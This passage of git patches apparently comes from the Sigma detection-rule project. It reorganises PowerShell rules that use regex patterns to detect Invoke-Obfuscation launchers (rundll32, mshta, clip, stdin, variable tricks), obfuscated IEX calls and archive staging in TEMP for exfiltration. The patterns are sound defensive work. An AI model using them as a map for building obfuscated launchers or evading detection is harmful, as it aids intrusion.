'(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' - condition: 1 of them + condition: selection_4103 falsepositives: - unknown level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml similarity index 64% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml index e47cf4f4..82369978 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml @@ -1,9 +1,13 @@ title: Invoke-Obfuscation RUNDLL LAUNCHER -id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 +id: a23791fe-8846-485a-b16b-ca691e1b03d4 +related: + - id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 + type: derived description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) tags: @@ -14,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: medium diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml similarity index 64% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml index 330912c9..15c1e5cd 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml @@ -1,5 +1,8 @@ title: Invoke-Obfuscation Via Stdin -id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 +id: c72aca44-8d52-45ad-8f81-f96c4d3c755e +related: + - id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 + type: derived description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community @@ -14,15 +17,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enable for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml similarity index 64% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml index 30749fc4..482721a0 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml @@ -1,5 +1,8 @@ title: Invoke-Obfuscation Via Use Clip -id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0 +id: ebdf49d8-b89c-46c9-8fdf-2c308406f6bd +related: + - id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0 + type: derived description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community @@ -14,15 +17,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml similarity index 63% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml index ceaab349..ab47039d 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -1,9 +1,13 @@ title: Invoke-Obfuscation Via Use MSHTA -id: e55a5195-4724-480e-a77e-3ebe64bd3759 +id: 07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb +related: + - id: e55a5195-4724-480e-a77e-3ebe64bd3759 + type: derived description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/08 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) tags: @@ -14,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enabled detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml similarity index 63% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml index 445355bc..deee26ed 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -1,9 +1,13 @@ title: Invoke-Obfuscation Via Use Rundll32 -id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b +id: 88a22f69-62f9-4b8a-aa00-6b0212f2f05a +related: + - id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b + type: derived description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2019/10/08 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 tags: @@ -14,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml similarity index 62% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_var.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml index 60a0fe2b..06d3381a 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml @@ -1,10 +1,13 @@ title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION -id: e54f5149-6ba3-49cf-b153-070d24679126 +id: f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6 +related: + - id: e54f5149-6ba3-49cf-b153-070d24679126 + type: derived description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/13 -modified: 2021/07/15 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) tags: @@ -15,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enabled detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r - selection_2: + selection_4103: EventID: 4103 Payload|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r - condition: selection_1 or selection_2 + condition: selection_4103 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_module/powershell_powercat.yml similarity index 100% rename from rules/windows/powershell/powershell_powercat.yml rename to rules/windows/powershell/powershell_module/powershell_powercat.yml diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml similarity index 90% rename from rules/windows/powershell/powershell_remote_powershell_session.yml rename to rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml index 146af6e5..c7795387 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable and fields have to be extract from event + definition: Module Logging must be enable detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml similarity index 100% rename from rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml rename to rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml diff --git a/rules/windows/powershell/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml similarity index 63% rename from rules/windows/powershell/powershell_susp_zip_compress.yml rename to rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml index 98f882e4..ab97eb0d 100644 --- a/rules/windows/powershell/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml @@ -1,9 +1,12 @@ title: Zip A Folder With PowerShell For Staging In Temp -id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 +id: daf7eb81-35fd-410d-9d7a-657837e602bb +related: + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 + related: derived status: experimental author: frack113 date: 2021/07/20 -modified: 2021/09/30 +modified: 2021/10/09 description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md @@ -13,7 +16,7 @@ tags: logsource: product: windows service: powershell - definition: 4103 Module Logging must be enabled , 4104 Script Block Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 @@ -22,14 +25,7 @@ detection: - ' -Path ' - ' -DestinationPath ' - '$env:TEMP\' - selection_4104: - EventID: 4104 - ScriptBlockText|contains|all: - - 'Compress-Archive ' - - ' -Path ' - - ' -DestinationPath ' - - '$env:TEMP\' - condition: selection_4103 or selection_4104 + condition: selection_4103 falsepositives: - Unknown level: medium From 9b0f744f75ec6c1d2c5043d527cfe7db1a40692c Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 9 Oct 2021 09:57:45 +0200 Subject: [PATCH 1190/1367] order powershell_script --- ...ke_obfuscation_clip_in_scriptblocktext.yml | 26 +++++++++++++++ ...tion_obfuscated_iex_in_scriptblocktext.yml | 32 +++++++++++++++++++ ...e_obfuscation_stdin_in_scriptblocktext.yml | 26 +++++++++++++++ ...oke_obfuscation_var_in_scriptblocktext.yml | 26 +++++++++++++++ ...cation_via_compress_in_scriptblocktext.yml | 26 +++++++++++++++ ...uscation_via_rundll_in_scriptblocktext.yml | 26 +++++++++++++++ ...fuscation_via_stdin_in_scriptblocktext.yml | 26 +++++++++++++++ ...cation_via_use_clip_in_scriptblocktext.yml | 26 +++++++++++++++ ...ation_via_use_mhsta_in_scriptblocktext.yml | 26 +++++++++++++++ ...on_via_use_rundll32_in_scriptblocktext.yml | 26 +++++++++++++++ ...obfuscation_via_var_in_scriptblocktext.yml | 26 +++++++++++++++ ...l_susp_zip_compress_in_scriptblocktext.yml | 28 ++++++++++++++++ 12 files changed, 320 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml new file mode 100644 index 00000000..3d0f3df1 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation CLIP+ Launcher +id: 73e67340-0d25-11eb-adc1-0242ac120002 +description: Detects Obfuscated use of Clip.exe to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/13 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + condition: selection_4104 +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml new file mode 100644 index 00000000..3e4126e7 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml @@ -0,0 +1,32 @@ +title: Invoke-Obfuscation Obfuscated IEX Invocation +id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 +description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" +status: experimental +author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community +date: 2019/11/08 +modified: 2021/10/07 +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_1: + EventID: 4104 + selection_2: + - ScriptBlockText|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' + - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' + - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' + - ScriptBlockText|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' + - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name' + - ScriptBlockText|re: '\$VerbosePreference\.ToString\(' + - ScriptBlockText|re: '\String\]\s*\$VerbosePreference' + condition: selection_1 and selection_2 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml new file mode 100644 index 00000000..2cb8ef01 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation STDIN+ Launcher +id: 779c8c12-0eb1-11eb-adc1-0242ac120002 +description: Detects Obfuscated use of stdin to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/15 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + condition: selection_4104 +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml new file mode 100644 index 00000000..c0460b5f --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation VAR+ Launcher +id: 0adfbc14-0ed1-11eb-adc1-0242ac120002 +description: Detects Obfuscated use of Environment Variables to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/15 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + condition: selection_4104 +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml new file mode 100644 index 00000000..3151cae7 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation COMPRESS OBFUSCATION +id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07 +description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/18 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' + condition: selection_4104 +falsepositives: + - unknown +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml new file mode 100644 index 00000000..b17ab890 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation RUNDLL LAUNCHER +id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 +description: Detects Obfuscated Powershell via RUNDLL LAUNCHER +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/18 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' + condition: selection_4104 +falsepositives: + - Unknown +level: medium diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml new file mode 100644 index 00000000..c2b5f127 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation Via Stdin +id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 +description: Detects Obfuscated Powershell via Stdin in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/12 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + condition: selection_4104 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml new file mode 100644 index 00000000..9205a254 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation Via Use Clip +id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0 +description: Detects Obfuscated Powershell via use Clip.exe in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/09 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + condition: selection_4104 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml new file mode 100644 index 00000000..d6455878 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation Via Use MSHTA +id: e55a5195-4724-480e-a77e-3ebe64bd3759 +description: Detects Obfuscated Powershell via use MSHTA in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/08 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' + condition: selection_4104 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml new file mode 100644 index 00000000..516fc3fc --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation Via Use Rundll32 +id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b +description: Detects Obfuscated Powershell via use Rundll32 in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2019/10/08 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' + condition: selection_4104 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml new file mode 100644 index 00000000..cec226f8 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION +id: e54f5149-6ba3-49cf-b153-070d24679126 +description: Detects Obfuscated Powershell via VAR++ LAUNCHER +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/13 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + condition: selection_4104 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml new file mode 100644 index 00000000..1073d0a1 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml @@ -0,0 +1,28 @@ +title: Zip A Folder With PowerShell For Staging In Temp +id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 +status: experimental +author: frack113 +date: 2021/07/20 +modified: 2021/10/09 +description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md +tags: + - attack.collection + - attack.t1074.001 +logsource: + product: windows + service: powershell + definition: Script Block Logging must be enable +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|contains|all: + - 'Compress-Archive ' + - ' -Path ' + - ' -DestinationPath ' + - '$env:TEMP\' + condition: selection_4104 +falsepositives: + - Unknown +level: medium From 41d098b253859826b007edf7940b2f2127778723 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 9 Oct 2021 09:59:21 +0200 Subject: [PATCH 1191/1367] fix yml error --- .../powershell_module/powershell_invoke_obfuscation_clip.yml | 2 +- .../powershell_invoke_obfuscation_via_stdin.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml index a203d470..604505ae 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml @@ -1,6 +1,6 @@ title: Invoke-Obfuscation CLIP+ Launcher id: a136cde0-61ad-4a61-9b82-8dc490e60dd2 -related : +related: - id: 73e67340-0d25-11eb-adc1-0242ac120002 type: derived description: Detects Obfuscated use of Clip.exe to execute PowerShell diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml index 15c1e5cd..65fff0f1 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml @@ -19,7 +19,7 @@ logsource: service: powershell definition: Module Logging must be enable detection: - selection_4103: + selection_4103: EventID: 4103 Payload|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: 